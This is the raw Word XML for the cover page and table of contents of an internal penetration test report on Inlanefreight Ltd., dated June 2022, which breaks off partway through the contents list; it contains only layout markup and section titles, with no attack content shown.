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41D2B"/>
  <w:body>
    <w:p w14:paraId="33CFFDF8" w14:textId="608D7ADA" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="4D4EE7E9" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="6723C729" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="629C50DA" w14:textId="310C1A03" w:rsidR="003D6D54" w:rsidRDefault="00342ADF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="384EB903" wp14:editId="767E263A">
            <wp:extent cx="6858000" cy="1325880"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18" name="Picture 18"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58000" cy="1325880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2474C330" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="2E70E054" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="3B5AD2D4" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="2656E077" w14:textId="0CD749D5" w:rsidR="003D6D54" w:rsidRDefault="00AF5E0D" w:rsidP="00AF5E0D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A382E1F" wp14:editId="118F53AB">
            <wp:extent cx="3459193" cy="1309498"/>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263" cy="1337538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDF9B6" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="5D91BC11" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="5035801F" w14:textId="77A5FACD" w:rsidR="003D6D54" w:rsidRPr="003D6D54" w:rsidRDefault="007179EE" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="CoverHeading"/>
      </w:pPr>
      <w:r>
        <w:t>Internal</w:t>
      </w:r>
      <w:r w:rsidR="00FA7CD1">
        <w:t xml:space="preserve"> Penetration Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F80F48A" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRPr="003D6D54" w:rsidRDefault="003D6D54" w:rsidP="003D6D54">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D6D54">
        <w:rPr>
          <w:b/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Report of Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F17583" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="3235EA39" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="5967590F" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="6CD071CF" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="13AAF87B" w14:textId="77777777" w:rsidR="003D6D54" w:rsidRDefault="003D6D54"/>
    <w:p w14:paraId="210B37EA" w14:textId="46C658C7" w:rsidR="003D6D54" w:rsidRPr="00FA3B59" w:rsidRDefault="00D14781" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="CoverSubtitle"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Inlanefreight</w:t>
      </w:r>
      <w:r w:rsidR="00655232">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> Ltd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466CCC72" w14:textId="37D3BA92" w:rsidR="003D6D54" w:rsidRPr="00FA3B59" w:rsidRDefault="003D6D54" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="CoverDate"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC21AF">
        <w:t>June 2</w:t>
      </w:r>
      <w:r w:rsidR="00655232">
        <w:t>, 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AF0052" w14:textId="3291B821" w:rsidR="009C4180" w:rsidRPr="0000244D" w:rsidRDefault="003D6D54" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="CoverVersion"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00042DC8">
        <w:t>Version 1.0</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_Toc95329517"/>
      <w:bookmarkStart w:id="1" w:name="_Toc95329677"/>
      <w:bookmarkStart w:id="2" w:name="_Toc95329942"/>
      <w:bookmarkStart w:id="3" w:name="_Toc95385552"/>
    </w:p>
    <w:p w14:paraId="30815447" w14:textId="77777777" w:rsidR="00C53C23" w:rsidRDefault="00C53C23">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="9FEF00"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc95409149"/>
      <w:bookmarkStart w:id="5" w:name="_Toc95409225"/>
      <w:r>
        <w:rPr>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AC0C1B" w14:textId="0A7881EE" w:rsidR="003D6D54" w:rsidRPr="00FA3B59" w:rsidRDefault="00AB5E0D" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
      </w:pPr>
      <w:r w:rsidRPr="00FA3B59">
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="723A22BB" w14:textId="4A63B8B3" w:rsidR="001C6D4A" w:rsidRDefault="002829EF">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> TOC \o "1-1" \h \z \t "HTB heading 2,2" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc106718117" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Statement of Confidentiality</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718117 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B535379" w14:textId="3A170202" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718118" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Engagement Contacts</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718118 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="06B62665" w14:textId="63A0D303" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718119" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Executive Summary</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718119 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="14EBB794" w14:textId="6FC38FE2" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718120" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Approach</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718120 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31EE55CC" w14:textId="387F96FE" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718121" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Scope</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718121 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1F5E5352" w14:textId="683D34B4" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718122" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Assessment Overview and Recommendations</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718122 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00AF2CF6" w14:textId="780D4320" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718123" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Network Penetration Test Assessment Summary</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718123 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5B5C875F" w14:textId="5BAC34D8" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718124" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Summary of Findings</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718124 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="07C23596" w14:textId="3B967072" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718125" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Internal Network Compromise Walkthrough</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718125 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="408E73EA" w14:textId="7BC4589D" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718126" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Detailed Walkthrough</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718126 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3401A93B" w14:textId="4EB2CE20" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC1"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718127" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Remediation Summary</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc106718127 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3EC61260" w14:textId="5F7940E6" w:rsidR="001C6D4A" w:rsidRDefault="00F60579">
      <w:pPr>
        <w:pStyle w:val="TOC2"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc106718128" w:history="1">
        <w:r w:rsidR="001C6D4A" w:rsidRPr="004D1A3D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Short Term</w:t>
        </w:r>
        <w:r w:rsidR="001C6D4A">
